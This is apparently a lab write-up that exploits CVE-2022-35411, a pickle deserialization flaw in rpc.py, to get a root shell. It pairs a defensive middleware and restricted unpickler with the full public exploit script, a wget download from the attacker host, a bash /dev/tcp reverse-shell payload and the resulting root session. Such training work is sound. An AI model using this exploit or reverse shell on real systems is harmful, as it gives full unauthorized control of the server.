CVE-2022-35411
There is an ASGI-based custom RPC server running as the root account that uses an outdated version of the rpc.py module, vulnerable to CVE-2022-35411.
A vulnerability has been found in rpc.py up to 0.6.0 and classified as critical. Affected by this vulnerability is an unknown function of the component HTTP Header Handler. The manipulation of the argument serializer with an unknown input leads to a deserialization vulnerability. The CWE definition for the vulnerability is CWE-502. The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid. As an impact it is known to affect confidentiality, integrity, and availability.
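A defender-side counterpart, added here and not part of the original exploit or of rpc.py itself: an ASGI middleware that refuses any `serializer` header outside an allow-list (it assumes a request without the header falls back to the JSON default), plus a restricted unpickler for deployments that cannot drop pickle entirely. `SerializerGuard`, `loads_outcome` and the sample byte strings are hypothetical names constructed for this example.

```python
import io
import os
import pickle

# Serializers a hardened rpc.py deployment accepts. "pickle" is deliberately
# absent: selecting it through the HTTP header is what CVE-2022-35411 abuses.
ALLOWED_SERIALIZERS = {"json"}

def serializer_allowed(headers):
    """headers: ASGI-style list of (name, value) byte pairs. No header is
    assumed to mean the JSON default; any other explicit value is refused."""
    for name, value in headers:
        if name.lower() == b"serializer":
            return value.decode("latin-1").strip().lower() in ALLOWED_SERIALIZERS
    return True

class SerializerGuard:
    """ASGI middleware (hypothetical name): reject with 415 before the wrapped
    RPC app ever reads the request body."""
    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http" and not serializer_allowed(scope.get("headers", [])):
            await send({"type": "http.response.start", "status": 415,
                        "headers": [(b"content-type", b"text/plain")]})
            await send({"type": "http.response.body", "body": b"unsupported serializer"})
            return
        await self.app(scope, receive, send)

class RestrictedUnpickler(pickle.Unpickler):
    """Defence in depth if pickle must stay on: refuse every GLOBAL/STACK_GLOBAL
    lookup, so a __reduce__ gadget can never resolve a callable."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def loads_outcome(data):
    """("ok", obj) for plain data, ("rejected", reason) if the pickle imports."""
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)

# Constructed samples: an ordinary RPC argument dict, and a pickle that only
# references a harmless global (os.getcwd), which is enough to trip the guard.
SAMPLE_BENIGN = pickle.dumps({"method": "sayhi", "args": ["pc"]})
SAMPLE_GLOBAL_REF = pickle.dumps(os.getcwd)
```

Wrapping the RPC app as `SerializerGuard(app)` makes the header check run before rpc.py's own serializer lookup, so a rejected request never reaches `pickle.loads`.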
Exploit
# Exploit Title: Remote Code Execution in rpc.py through 0.6.0
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle

# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST = "127.0.0.1:65432"
URL = f"http://{HOST}/sayhi"
HEADERS = {
    "serializer": "pickle"  # rpc.py selects the deserializer from this request header
}

def generate_payload(cmd):
    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload = pickle.dumps(PickleRce())
    print(payload)
    return payload

def exec_command(cmd):
    payload = generate_payload(cmd)
    requests.post(url=URL, data=payload, headers=HEADERS)

def main():
    exec_command('curl http://127.0.0.1:4321')
    # exec_command('uname -a')

if __name__ == "__main__":
    main()
Exploit found online
Modification
Appended the reverse shell payload
Exploitation
user@pc:/var/tmp$ wget -q http://192.168.45.218/CVE-2022-35411.py
Delivery complete
user@pc:/var/tmp$ python3 CVE-2022-35411.py
b'\x80\x04\x95Q\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c6bash -c "bash -i >& /dev/tcp/192.168.45.218/1234 0>&1"\x94\x85\x94R\x94.'
Executing the exploit script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pc]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.179.210] 47578
bash: cannot set terminal process group (1040): Inappropriate ioctl for device
bash: no job control in this shell
root@pc:/# whoami
root
root@pc:/# hostname
pc
root@pc:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:76:90 brd ff:ff:ff:ff:ff:ff
    inet 192.168.179.210/24 brd 192.168.179.255 scope global ens160
       valid_lft forever preferred_lft forever
System level compromise